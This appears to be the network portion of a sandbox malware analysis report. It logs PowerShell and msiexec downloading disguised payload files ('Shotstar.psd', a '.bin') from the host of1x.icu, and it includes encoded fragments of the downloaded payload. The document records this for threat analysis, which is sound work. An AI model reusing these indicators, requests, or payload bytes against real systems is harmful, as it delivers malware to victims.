                                                              Dec 19, 2024 07:52:56.513001919 CET49820443192.168.2.6104.21.86.72
                                                              Dec 19, 2024 07:52:56.520606041 CET44349820104.21.86.72192.168.2.6
                                                              Dec 19, 2024 07:52:56.520673037 CET44349820104.21.86.72192.168.2.6
                                                              Dec 19, 2024 07:52:56.520750999 CET49820443192.168.2.6104.21.86.72
                                                              Dec 19, 2024 07:52:56.520750999 CET49820443192.168.2.6104.21.86.72
                                                              Dec 19, 2024 07:52:56.520761967 CET44349820104.21.86.72192.168.2.6
                                                              Dec 19, 2024 07:52:56.520831108 CET49820443192.168.2.6104.21.86.72
                                                              Dec 19, 2024 07:52:56.528585911 CET44349820104.21.86.72192.168.2.6
                                                              Dec 19, 2024 07:52:56.528635025 CET44349820104.21.86.72192.168.2.6
                                                              Dec 19, 2024 07:52:56.528709888 CET49820443192.168.2.6104.21.86.72
                                                              Dec 19, 2024 07:52:56.528717995 CET44349820104.21.86.72192.168.2.6
                                                              Dec 19, 2024 07:52:56.528728008 CET49820443192.168.2.6104.21.86.72
                                                              Dec 19, 2024 07:52:56.528950930 CET49820443192.168.2.6104.21.86.72
                                                              Dec 19, 2024 07:52:56.535793066 CET44349820104.21.86.72192.168.2.6
                                                              Dec 19, 2024 07:52:56.535823107 CET44349820104.21.86.72192.168.2.6
                                                              Dec 19, 2024 07:52:56.535885096 CET49820443192.168.2.6104.21.86.72
                                                              Dec 19, 2024 07:52:56.535896063 CET44349820104.21.86.72192.168.2.6
                                                              Dec 19, 2024 07:52:56.536006927 CET49820443192.168.2.6104.21.86.72
                                                              Dec 19, 2024 07:52:56.536547899 CET49820443192.168.2.6104.21.86.72
                                                              Dec 19, 2024 07:52:56.542473078 CET44349820104.21.86.72192.168.2.6
                                                              Dec 19, 2024 07:52:56.542521000 CET44349820104.21.86.72192.168.2.6
                                                              Dec 19, 2024 07:52:56.542573929 CET49820443192.168.2.6104.21.86.72
                                                              Dec 19, 2024 07:52:56.542582989 CET44349820104.21.86.72192.168.2.6
                                                              Dec 19, 2024 07:52:56.542637110 CET49820443192.168.2.6104.21.86.72
                                                              Dec 19, 2024 07:52:56.542637110 CET49820443192.168.2.6104.21.86.72
                                                              Dec 19, 2024 07:52:56.679241896 CET44349820104.21.86.72192.168.2.6
                                                              Dec 19, 2024 07:52:56.679301977 CET44349820104.21.86.72192.168.2.6
                                                              Dec 19, 2024 07:52:56.679352045 CET49820443192.168.2.6104.21.86.72
                                                              Dec 19, 2024 07:52:56.679371119 CET44349820104.21.86.72192.168.2.6
                                                              Dec 19, 2024 07:52:56.679452896 CET49820443192.168.2.6104.21.86.72
                                                              Dec 19, 2024 07:52:56.679482937 CET49820443192.168.2.6104.21.86.72
                                                              Dec 19, 2024 07:52:56.685128927 CET44349820104.21.86.72192.168.2.6
                                                              Dec 19, 2024 07:52:56.685158014 CET44349820104.21.86.72192.168.2.6
                                                              Dec 19, 2024 07:52:56.685252905 CET49820443192.168.2.6104.21.86.72
                                                              Dec 19, 2024 07:52:56.685252905 CET49820443192.168.2.6104.21.86.72
                                                              Dec 19, 2024 07:52:56.685261965 CET44349820104.21.86.72192.168.2.6
                                                              Dec 19, 2024 07:52:56.685311079 CET49820443192.168.2.6104.21.86.72
                                                              Dec 19, 2024 07:52:56.690376043 CET44349820104.21.86.72192.168.2.6
                                                              Dec 19, 2024 07:52:56.690392017 CET44349820104.21.86.72192.168.2.6
                                                              Dec 19, 2024 07:52:56.690459967 CET49820443192.168.2.6104.21.86.72
                                                              Dec 19, 2024 07:52:56.690471888 CET44349820104.21.86.72192.168.2.6
                                                              Dec 19, 2024 07:52:56.690485001 CET49820443192.168.2.6104.21.86.72
                                                              Dec 19, 2024 07:52:56.690516949 CET49820443192.168.2.6104.21.86.72
                                                              Dec 19, 2024 07:52:56.696415901 CET44349820104.21.86.72192.168.2.6
                                                              Dec 19, 2024 07:52:56.696432114 CET44349820104.21.86.72192.168.2.6
                                                              Dec 19, 2024 07:52:56.696489096 CET49820443192.168.2.6104.21.86.72
                                                              Dec 19, 2024 07:52:56.696506977 CET44349820104.21.86.72192.168.2.6
                                                              Dec 19, 2024 07:52:56.696614027 CET49820443192.168.2.6104.21.86.72
                                                              Dec 19, 2024 07:52:56.697335005 CET49820443192.168.2.6104.21.86.72
                                                              Dec 19, 2024 07:52:56.702486992 CET44349820104.21.86.72192.168.2.6
                                                              Dec 19, 2024 07:52:56.702503920 CET44349820104.21.86.72192.168.2.6
                                                              Dec 19, 2024 07:52:56.702595949 CET49820443192.168.2.6104.21.86.72
                                                              Dec 19, 2024 07:52:56.702595949 CET49820443192.168.2.6104.21.86.72
                                                              Dec 19, 2024 07:52:56.702604055 CET44349820104.21.86.72192.168.2.6
                                                              Dec 19, 2024 07:52:56.702692986 CET49820443192.168.2.6104.21.86.72
                                                              Dec 19, 2024 07:52:56.708190918 CET44349820104.21.86.72192.168.2.6
                                                              Dec 19, 2024 07:52:56.708208084 CET44349820104.21.86.72192.168.2.6
                                                              Dec 19, 2024 07:52:56.708252907 CET49820443192.168.2.6104.21.86.72
                                                              Dec 19, 2024 07:52:56.708264112 CET44349820104.21.86.72192.168.2.6
                                                              Dec 19, 2024 07:52:56.708313942 CET49820443192.168.2.6104.21.86.72
                                                              Dec 19, 2024 07:52:56.708313942 CET49820443192.168.2.6104.21.86.72
                                                              Dec 19, 2024 07:52:56.714332104 CET44349820104.21.86.72192.168.2.6
                                                              Dec 19, 2024 07:52:56.714350939 CET44349820104.21.86.72192.168.2.6
                                                              Dec 19, 2024 07:52:56.714411020 CET49820443192.168.2.6104.21.86.72
                                                              Dec 19, 2024 07:52:56.714421988 CET44349820104.21.86.72192.168.2.6
                                                              Dec 19, 2024 07:52:56.714463949 CET49820443192.168.2.6104.21.86.72
                                                              Dec 19, 2024 07:52:56.714492083 CET49820443192.168.2.6104.21.86.72
                                                              Dec 19, 2024 07:52:56.719713926 CET44349820104.21.86.72192.168.2.6
                                                              Dec 19, 2024 07:52:56.719731092 CET44349820104.21.86.72192.168.2.6
                                                              Dec 19, 2024 07:52:56.719811916 CET49820443192.168.2.6104.21.86.72
                                                              Dec 19, 2024 07:52:56.719811916 CET49820443192.168.2.6104.21.86.72
                                                              Dec 19, 2024 07:52:56.719822884 CET44349820104.21.86.72192.168.2.6
                                                              Dec 19, 2024 07:52:56.719866991 CET49820443192.168.2.6104.21.86.72
                                                              Dec 19, 2024 07:52:56.871035099 CET44349820104.21.86.72192.168.2.6
                                                              Dec 19, 2024 07:52:56.871058941 CET44349820104.21.86.72192.168.2.6
                                                              Dec 19, 2024 07:52:56.871253967 CET49820443192.168.2.6104.21.86.72
                                                              Dec 19, 2024 07:52:56.871270895 CET44349820104.21.86.72192.168.2.6
                                                              Dec 19, 2024 07:52:56.871335983 CET49820443192.168.2.6104.21.86.72
                                                              Dec 19, 2024 07:52:56.871959925 CET44349820104.21.86.72192.168.2.6
                                                              Dec 19, 2024 07:52:56.872040987 CET44349820104.21.86.72192.168.2.6
                                                              Dec 19, 2024 07:52:56.872081041 CET49820443192.168.2.6104.21.86.72
                                                              Dec 19, 2024 07:52:56.872117043 CET49820443192.168.2.6104.21.86.72
                                                              Dec 19, 2024 07:52:56.980910063 CET49820443192.168.2.6104.21.86.72
                                                              Dec 19, 2024 07:52:56.980940104 CET44349820104.21.86.72192.168.2.6

                                                              UDP Packets

                                                              TimestampSource PortDest PortSource IPDest IP
                                                              Dec 19, 2024 07:52:13.939084053 CET5551053192.168.2.61.1.1.1
                                                              Dec 19, 2024 07:52:14.250530005 CET53555101.1.1.1192.168.2.6

                                                              DNS Queries

                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                              Dec 19, 2024 07:52:13.939084053 CET192.168.2.61.1.1.10x7596Standard query (0)of1x.icuA (IP address)IN (0x0001)false

                                                              DNS Answers

                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                              Dec 19, 2024 07:52:05.396501064 CET1.1.1.1192.168.2.60x83afNo error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                              Dec 19, 2024 07:52:05.396501064 CET1.1.1.1192.168.2.60x83afNo error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                                              Dec 19, 2024 07:52:14.250530005 CET1.1.1.1192.168.2.60x7596No error (0)of1x.icu104.21.86.72A (IP address)IN (0x0001)false
                                                              Dec 19, 2024 07:52:14.250530005 CET1.1.1.1192.168.2.60x7596No error (0)of1x.icu172.67.216.143A (IP address)IN (0x0001)false

                                                              HTTP Request Dependency Graph

                                                              • of1x.icu

                                                              HTTPS Proxied Packets

                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              0192.168.2.649731104.21.86.724433664C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-12-19 06:52:15 UTC173OUTGET /pnTClIjB/Shotstar.psd HTTP/1.1
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                              Host: of1x.icu
                                                              Connection: Keep-Alive
                                                              2024-12-19 06:52:16 UTC785INHTTP/1.1 200 OK
                                                              Date: Thu, 19 Dec 2024 06:52:15 GMT
                                                              Content-Type: application/octet-stream
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              cf-cache-status: DYNAMIC
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uQnF2lnF7I1jBmcjba4zqRv15SbPl7Sp5s1vUs8e4TIeA3j%2FCgzG%2Fivny42WX%2FRPT%2F6zCGwa6ackwUa726yNoSK%2BDHFYnxCkbngwTleOooHwUyIk9sjdlYh0bg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 8f4578067f61efa9-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1995&min_rtt=1987&rtt_var=762&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2818&recv_bytes=787&delivery_rate=1420924&cwnd=140&unsent_bytes=0&cid=aa003bd2dd51f149&ts=601&x=0"
                                                              2024-12-19 06:52:16 UTC1369INData Raw: 33 31 65 61 0d 0a 63 51 47 62 63 51 47 62 75 39 4f 76 45 77 44 72 41 6f 78 37 63 51 47 62 41 31 77 6b 42 48 45 42 6d 33 45 42 6d 37 6e 63 38 6a 44 78 36 77 4b 4b 32 48 45 42 6d 34 48 70 77 6c 55 37 36 6e 45 42 6d 2b 73 43 38 4a 79 42 36 52 71 64 39 51 5a 78 41 5a 76 72 41 68 47 68 63 51 47 62 63 51 47 62 75 70 7a 56 72 61 4c 72 41 69 51 4d 63 51 47 62 36 77 4b 67 58 75 73 43 4e 38 55 78 79 75 73 43 78 6e 39 78 41 5a 75 4a 46 41 74 78 41 5a 76 72 41 6c 58 5a 30 65 4a 78 41 5a 74 78 41 5a 75 44 77 51 52 78 41 5a 76 72 41 67 65 55 67 66 6e 74 59 69 55 46 66 4d 76 72 41 74 46 39 36 77 4c 2f 4b 6f 74 45 4a 41 54 72 41 72 36 73 63 51 47 62 69 63 50 72 41 69 72 4b 36 77 4a 4e 49 34 48 44 64 46 75 70 41 33 45 42 6d 2b 73 43 6c 4e 75 36 4b 78 65 4d 30 4f 73 43 6c
                                                              Data Ascii: 31eacQGbcQGbu9OvEwDrAox7cQGbA1wkBHEBm3EBm7nc8jDx6wKK2HEBm4HpwlU76nEBm+sC8JyB6Rqd9QZxAZvrAhGhcQGbcQGbupzVraLrAiQMcQGb6wKgXusCN8UxyusCxn9xAZuJFAtxAZvrAlXZ0eJxAZtxAZuDwQRxAZvrAgeUgfntYiUFfMvrAtF96wL/KotEJATrAr6scQGbicPrAirK6wJNI4HDdFupA3EBm+sClNu6KxeM0OsCl
                                                              2024-12-19 06:52:16 UTC1369INData Raw: 45 36 67 48 6f 41 64 54 47 76 75 69 53 54 65 77 42 47 75 32 77 68 64 57 49 5a 62 67 6a 41 65 69 49 34 31 42 6a 6a 4a 73 41 36 41 46 45 4f 44 6c 72 49 2f 35 64 79 53 49 42 36 49 48 62 43 51 41 61 61 67 58 6f 67 64 6c 50 61 58 78 53 33 48 63 42 49 67 35 6e 62 47 73 46 36 49 69 6e 4d 65 6b 42 49 6d 63 66 78 74 42 36 4c 30 55 47 43 5a 6e 58 4b 6f 6c 70 52 51 59 4a 57 4d 54 68 44 57 6c 31 42 67 6d 70 71 4c 76 41 61 55 55 47 43 55 6a 4c 69 4b 75 4f 68 4f 46 6e 30 63 4c 52 44 69 38 32 49 67 48 6f 41 53 49 42 36 41 45 32 54 62 72 78 4d 65 4c 30 62 4e 78 65 72 62 31 76 58 64 69 53 35 6c 44 51 36 50 2f 6b 5a 38 69 44 53 53 42 34 6b 2f 70 2b 61 5a 55 61 2f 31 4c 4b 32 76 55 46 49 6f 69 31 47 65 37 4c 47 52 32 71 65 6d 53 6b 45 50 56 4d 4f 78 50 75 59 30 77 36 75 77
                                                              Data Ascii: E6gHoAdTGvuiSTewBGu2whdWIZbgjAeiI41BjjJsA6AFEODlrI/5dySIB6IHbCQAaagXogdlPaXxS3HcBIg5nbGsF6IinMekBImcfxtB6L0UGCZnXKolpRQYJWMThDWl1BgmpqLvAaUUGCUjLiKuOhOFn0cLRDi82IgHoASIB6AE2TbrxMeL0bNxerb1vXdiS5lDQ6P/kZ8iDSSB4k/p+aZUa/1LK2vUFIoi1Ge7LGR2qemSkEPVMOxPuY0w6uw
                                                              2024-12-19 06:52:16 UTC1369INData Raw: 47 5a 6a 36 4e 36 61 49 45 33 55 65 43 38 4a 71 45 39 34 52 61 74 77 4e 59 2f 7a 4d 6d 32 48 61 7a 5a 64 68 77 67 55 51 63 33 2b 58 58 49 50 2f 50 33 6c 79 4b 72 32 51 4e 6d 49 5a 65 64 38 6d 49 50 6c 6e 36 54 46 56 66 49 2b 78 69 4b 63 68 36 51 45 69 7a 5a 71 45 66 47 42 61 7a 59 56 51 54 6f 35 53 44 37 4c 74 65 6f 42 68 75 4e 69 4b 32 32 72 2b 4a 35 33 4d 4f 50 62 57 51 30 74 70 45 39 78 6c 4f 46 38 67 31 64 4c 74 4c 4d 7a 69 2f 77 63 57 37 72 6d 34 48 50 67 76 50 61 50 77 36 31 45 48 61 32 6e 77 48 36 6b 4b 56 33 47 64 59 65 49 6a 43 6e 55 35 38 58 54 74 38 37 62 4a 5a 55 76 79 30 6a 4a 6e 35 69 79 75 73 6b 6e 4b 59 34 42 66 64 53 39 52 49 67 48 6e 6a 45 61 2b 36 41 46 35 5a 78 2f 41 70 61 75 78 69 4b 66 47 36 51 45 69 44 75 6b 53 46 51 48 6f 41 53 49
                                                              Data Ascii: GZj6N6aIE3UeC8JqE94RatwNY/zMm2HazZdhwgUQc3+XXIP/P3lyKr2QNmIZed8mIPln6TFVfI+xiKch6QEizZqEfGBazYVQTo5SD7LteoBhuNiK22r+J53MOPbWQ0tpE9xlOF8g1dLtLMzi/wcW7rm4HPgvPaPw61EHa2nwH6kKV3GdYeIjCnU58XTt87bJZUvy0jJn5iyusknKY4BfdS9RIgHnjEa+6AF5Zx/ApauxiKfG6QEiDukSFQHoASI
                                                              2024-12-19 06:52:16 UTC1369INData Raw: 49 71 49 46 73 31 73 67 4e 2f 4c 6d 43 64 69 70 76 79 7a 68 63 31 65 76 37 34 4e 45 63 71 6e 6f 2f 62 74 33 37 75 59 61 66 62 4c 51 43 78 6c 6f 38 5a 6d 55 4b 4f 6c 59 51 59 61 6e 39 54 2b 6a 55 53 4e 46 2f 4f 49 34 33 30 74 67 69 57 42 43 4d 4a 30 35 65 59 72 61 62 6e 51 6f 63 56 69 65 64 63 52 2f 59 79 52 5a 75 38 4e 31 70 39 37 57 7a 75 4f 58 62 34 72 30 34 38 6c 62 62 64 54 6d 43 74 56 55 54 69 41 47 6f 39 62 4d 63 47 41 30 4d 4d 41 48 6e 79 41 4b 70 76 32 67 58 70 51 76 6f 67 4a 43 44 4f 63 6a 6f 54 59 63 2b 65 74 78 55 6f 54 34 32 36 30 46 64 34 38 4b 77 64 6e 6a 75 6d 42 34 6a 55 6e 30 4f 39 37 56 31 5a 67 61 6b 65 75 67 74 78 76 35 34 32 41 50 75 77 42 66 46 75 41 6f 48 49 66 2f 47 6d 37 6b 57 75 49 6f 7a 58 4d 75 72 6e 41 61 34 41 6d 4a 61 70 79
                                                              Data Ascii: IqIFs1sgN/LmCdipvyzhc1ev74NEcqno/bt37uYafbLQCxlo8ZmUKOlYQYan9T+jUSNF/OI430tgiWBCMJ05eYrabnQocViedcR/YyRZu8N1p97WzuOXb4r048lbbdTmCtVUTiAGo9bMcGA0MMAHnyAKpv2gXpQvogJCDOcjoTYc+etxUoT4260Fd48KwdnjumB4jUn0O97V1Zgakeugtxv542APuwBfFuAoHIf/Gm7kWuIozXMurnAa4AmJapy
                                                              2024-12-19 06:52:16 UTC1369INData Raw: 6b 50 7a 51 6e 42 72 64 75 73 6b 76 45 53 44 32 55 4c 4d 44 53 41 46 69 58 6c 38 34 59 66 4a 4b 33 47 39 39 56 41 6f 76 42 4c 67 72 68 45 38 2b 4c 38 50 4f 63 73 48 36 56 79 70 57 75 72 64 39 47 67 77 6f 48 63 75 4c 34 73 48 36 39 41 67 46 35 49 6b 55 6d 49 6e 33 44 71 41 53 49 4f 36 54 49 4a 41 65 67 42 49 67 48 6f 41 53 49 6a 4f 47 7a 73 2b 78 71 59 58 54 4b 4c 50 77 41 4d 78 38 2f 41 6b 46 65 53 61 45 4e 31 67 4e 55 59 57 4c 77 55 67 42 2f 6b 36 70 77 6f 67 4e 56 37 32 6d 4e 4a 55 31 4b 37 41 54 67 79 67 4f 44 69 36 67 68 70 67 42 6f 70 6e 62 68 31 67 4e 43 30 63 50 71 61 56 33 53 49 78 41 6a 2b 6e 45 53 45 47 6e 49 37 4e 6b 45 79 6b 79 69 4b 5a 62 2f 71 43 51 79 31 4c 6c 78 6a 49 39 4f 66 61 5a 51 41 57 7a 52 41 52 43 38 6f 36 34 6e 37 72 33 52 6c 2f
                                                              Data Ascii: kPzQnBrduskvESD2ULMDSAFiXl84YfJK3G99VAovBLgrhE8+L8POcsH6VypWurd9GgwoHcuL4sH69AgF5IkUmIn3DqASIO6TIJAegBIgHoASIjOGzs+xqYXTKLPwAMx8/AkFeSaEN1gNUYWLwUgB/k6pwogNV72mNJU1K7ATgygODi6ghpgBopnbh1gNC0cPqaV3SIxAj+nESEGnI7NkEykyiKZb/qCQy1LlxjI9OfaZQAWzRARC8o64n7r3Rl/
                                                              2024-12-19 06:52:16 UTC1369INData Raw: 70 77 75 72 32 4f 51 71 6a 36 74 4f 49 5a 68 70 68 41 67 56 49 67 77 43 37 52 65 42 34 74 42 48 31 71 64 49 6e 71 2b 50 6b 69 79 7a 45 56 45 69 4d 77 6c 4d 5a 38 61 42 63 30 4f 53 51 65 59 42 46 6b 43 4d 42 36 42 62 4b 58 41 36 41 6c 35 44 70 41 53 49 76 45 66 47 30 67 47 32 51 49 77 48 6f 67 44 74 62 68 56 4f 59 56 77 2f 71 70 59 41 43 55 77 69 79 5a 59 44 67 64 4f 32 79 31 6f 41 61 59 72 6c 4d 6d 34 44 51 47 37 43 6e 76 31 5a 30 69 4d 55 41 2f 35 79 6d 30 5a 67 62 34 76 6f 41 45 45 65 46 6a 72 4f 53 6f 73 72 2b 4a 6d 39 41 48 2b 38 4d 63 45 75 2f 6b 34 77 6a 6c 46 70 46 68 65 74 65 62 63 6c 34 55 6c 50 63 66 4c 71 4c 67 4e 47 46 74 32 52 79 67 42 73 6b 44 6b 75 77 67 4f 45 54 59 32 32 32 69 4f 76 45 75 37 74 5a 45 36 59 44 69 42 79 39 46 79 33 45 4d 78
                                                              Data Ascii: pwur2OQqj6tOIZhphAgVIgwC7ReB4tBH1qdInq+PkiyzEVEiMwlMZ8aBc0OSQeYBFkCMB6BbKXA6Al5DpASIvEfG0gG2QIwHogDtbhVOYVw/qpYACUwiyZYDgdO2y1oAaYrlMm4DQG7Cnv1Z0iMUA/5ym0Zgb4voAEEeFjrOSosr+Jm9AH+8McEu/k4wjlFpFhetebcl4UlPcfLqLgNGFt2RygBskDkuwgOETY222iOvEu7tZE6YDiBy9Fy3EMx
                                                              2024-12-19 06:52:16 UTC1369INData Raw: 6b 4f 32 6d 54 58 37 4d 4c 41 4c 46 56 4c 52 78 6e 57 48 69 4b 77 4a 31 68 50 4e 77 38 59 4c 4a 37 2f 4a 64 35 35 66 48 56 4d 41 69 38 55 48 35 47 35 67 63 38 79 77 71 2b 63 52 42 53 56 4c 67 68 43 68 61 70 74 4f 77 7a 64 38 44 66 56 4d 49 63 59 64 69 6e 71 4a 6c 4b 6e 77 6c 38 54 70 42 4d 6b 6d 49 76 2b 72 70 41 53 4b 36 6d 55 56 67 72 37 69 35 46 68 41 35 48 69 64 79 6a 37 58 67 4e 48 50 42 58 6e 62 64 73 71 64 6c 67 7a 54 46 72 48 58 2f 71 78 47 2b 65 68 36 49 2f 49 41 71 4f 63 66 41 4f 74 4f 6b 53 79 2b 61 2b 61 48 31 31 33 4d 57 30 73 4f 4e 62 66 56 46 4b 79 53 74 61 52 70 49 75 57 57 4f 57 61 50 79 35 30 6d 6e 33 43 54 36 6e 69 46 4c 57 69 37 34 4f 64 52 68 4e 38 62 67 6d 4d 70 36 67 4e 47 5a 4d 66 41 2f 44 75 6a 61 75 77 48 6f 41 53 49 42 36 41 45
                                                              Data Ascii: kO2mTX7MLALFVLRxnWHiKwJ1hPNw8YLJ7/Jd55fHVMAi8UH5G5gc8ywq+cRBSVLghChaptOwzd8DfVMIcYdinqJlKnwl8TpBMkmIv+rpASK6mUVgr7i5FhA5Hidyj7XgNHPBXnbdsqdlgzTFrHX/qxG+eh6I/IAqOcfAOtOkSy+a+aH113MW0sONbfVFKyStaRpIuWWOWaPy50mn3CT6niFLWi74OdRhN8bgmMp6gNGZMfA/DujauwHoASIB6AE
                                                              2024-12-19 06:52:16 UTC1369INData Raw: 51 62 69 78 36 52 4d 67 4f 77 6c 7a 4a 2f 78 31 65 37 55 48 2b 52 7a 50 38 4b 35 4a 78 76 4b 6e 7a 56 2b 75 64 44 32 4f 43 78 64 62 51 41 71 4f 62 78 67 51 49 33 70 78 57 39 61 53 6b 52 37 54 77 2f 4d 48 79 6a 75 39 32 75 79 71 56 45 7a 57 37 71 43 33 73 59 4d 46 67 70 62 37 34 68 64 72 43 4d 42 36 4c 39 67 6d 59 2b 76 6f 2f 66 75 4a 6d 64 2b 4a 4d 66 2b 43 6f 30 78 4e 78 41 56 79 35 6c 65 77 74 75 6f 54 51 7a 52 73 6b 7a 68 67 4e 53 38 39 48 53 50 67 43 34 69 66 71 6c 72 55 70 6d 39 44 49 66 41 67 43 76 66 4e 48 41 5a 67 4d 6d 62 45 76 62 78 56 6e 53 49 78 51 44 33 6e 45 51 34 4b 48 73 30 70 33 4d 71 34 47 4a 41 72 67 51 53 44 42 67 39 56 78 5a 67 37 44 72 35 50 6f 67 54 31 77 75 31 35 7a 59 42 6a 38 70 56 30 38 6c 34 6a 59 56 47 4f 51 5a 65 70 73 6d 7a
                                                              Data Ascii: Qbix6RMgOwlzJ/x1e7UH+RzP8K5JxvKnzV+udD2OCxdbQAqObxgQI3pxW9aSkR7Tw/MHyju92uyqVEzW7qC3sYMFgpb74hdrCMB6L9gmY+vo/fuJmd+JMf+Co0xNxAVy5lewtuoTQzRskzhgNS89HSPgC4ifqlrUpm9DIfAgCvfNHAZgMmbEvbxVnSIxQD3nEQ4KHs0p3Mq4GJArgQSDBg9VxZg7Dr5PogT1wu15zYBj8pV08l4jYVGOQZepsmz
                                                              2024-12-19 06:52:16 UTC1369INData Raw: 4c 74 5a 34 41 5a 68 46 49 33 52 49 44 54 65 41 50 38 69 6f 41 5a 32 42 62 42 45 56 47 2b 69 41 67 41 4b 70 7a 51 77 31 30 6b 6f 2f 56 4a 54 65 35 63 68 63 57 7a 6b 6a 43 53 47 73 73 4c 72 62 49 50 6f 78 6f 59 75 72 66 6a 38 75 54 61 67 33 51 7a 52 52 77 30 51 34 6e 63 49 35 6c 52 4d 6b 67 72 51 6d 66 52 32 48 6f 34 4f 56 6a 75 57 58 61 36 70 75 51 56 50 31 58 78 41 46 73 4a 73 6a 4d 63 45 79 4d 49 48 47 4b 41 30 41 4f 4a 62 4a 4e 30 77 59 47 51 42 5a 70 30 4e 63 30 68 76 38 39 71 34 69 33 4c 6c 6e 55 2f 38 43 33 6e 4c 53 53 76 45 76 30 6b 6a 4e 77 48 79 7a 41 78 6b 77 79 77 4a 4c 7a 4f 39 43 70 6e 39 6f 43 38 6c 41 47 4f 47 2b 41 47 67 56 6f 49 4b 33 53 4a 7a 53 58 78 77 75 61 42 2f 6b 4b 38 46 42 4b 31 4c 46 4a 53 6c 78 38 57 69 72 38 70 36 51 45 69 7a
                                                              Data Ascii: LtZ4AZhFI3RIDTeAP8ioAZ2BbBEVG+iAgAKpzQw10ko/VJTe5chcWzkjCSGssLrbIPoxoYurfj8uTag3QzRRw0Q4ncI5lRMkgrQmfR2Ho4OVjuWXa6puQVP1XxAFsJsjMcEyMIHGKA0AOJbJN0wYGQBZp0Nc0hv89q4i3LlnU/8C3nLSSvEv0kjNwHyzAxkwywJLzO9Cpn9oC8lAGOG+AGgVoIK3SJzSXxwuaB/kK8FBK1LFJSlx8Wir8p6QEiz
                                                              2024-12-19 06:52:16 UTC465INData Raw: 4e 73 51 65 32 58 73 66 39 68 79 70 71 67 67 34 61 45 77 52 58 4d 35 50 58 66 50 34 4c 70 56 58 59 6b 36 37 5a 61 56 4e 64 6f 6e 54 33 49 6f 31 53 59 35 79 4d 41 4f 67 42 53 69 7a 53 7a 70 53 41 37 43 55 58 4d 31 68 66 6f 7a 58 4d 30 68 50 31 47 77 37 6c 4d 53 67 42 49 67 48 6f 41 53 49 42 36 42 68 6f 2b 30 47 44 61 41 77 4a 30 39 4b 30 56 6c 51 53 50 4a 75 58 5a 63 36 4a 50 6d 5a 44 6e 2b 39 61 67 4d 51 6c 6b 31 78 6a 35 2b 35 45 53 47 32 45 74 53 69 35 64 5a 36 2f 44 6a 2b 69 74 55 6e 54 76 74 67 63 66 30 45 58 7a 58 72 39 30 6f 6b 59 49 6d 68 47 46 4f 4b 41 45 4c 6f 67 41 6f 41 57 4a 65 4a 73 67 35 55 6b 70 5a 4e 45 72 47 59 4f 4f 33 4d 78 45 36 33 77 43 7a 63 56 79 61 75 30 49 4f 54 69 70 6e 54 46 2f 51 52 6f 47 51 7a 7a 32 5a 78 55 32 35 47 72 38 57
                                                              Data Ascii: NsQe2Xsf9hypqgg4aEwRXM5PXfP4LpVXYk67ZaVNdonT3Io1SY5yMAOgBSizSzpSA7CUXM1hfozXM0hP1Gw7lMSgBIgHoASIB6Bho+0GDaAwJ09K0VlQSPJuXZc6JPmZDn+9agMQlk1xj5+5ESG2EtSi5dZ6/Dj+itUnTvtgcf0EXzXr90okYImhGFOKAELogAoAWJeJsg5UkpZNErGYOO3MxE63wCzcVyau0IOTipnTF/QRoGQzz2ZxU25Gr8W


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              1192.168.2.649820104.21.86.724434000C:\Windows\SysWOW64\msiexec.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-12-19 06:52:55 UTC188OUTGET /SPJvBNUT/VgfkXiQUJNREEqCxjfN242.bin HTTP/1.1
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                              Host: of1x.icu
                                                              Cache-Control: no-cache
                                                              2024-12-19 06:52:55 UTC862INHTTP/1.1 200 OK
                                                              Date: Thu, 19 Dec 2024 06:52:55 GMT
                                                              Content-Type: application/octet-stream
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              Cache-Control: max-age=14400
                                                              CF-Cache-Status: MISS
                                                              Last-Modified: Thu, 19 Dec 2024 06:52:55 GMT
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GXsOy0%2BNnReWggCOZq1jkp10z%2FUYa%2BvTPYBw15yyTTR2t9QcBPRpXU122a7A0ygkCZCoEGWNGYqyfd%2BVbJmaW82vwT3wqYutfj%2F8Yqtga0Fu%2Bl4pX%2FokHsrOSg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 8f4578fdca4f8ce0-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1987&min_rtt=1985&rtt_var=748&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2817&recv_bytes=826&delivery_rate=1458541&cwnd=206&unsent_bytes=0&cid=8bf286dd2bc72a27&ts=680&x=0"
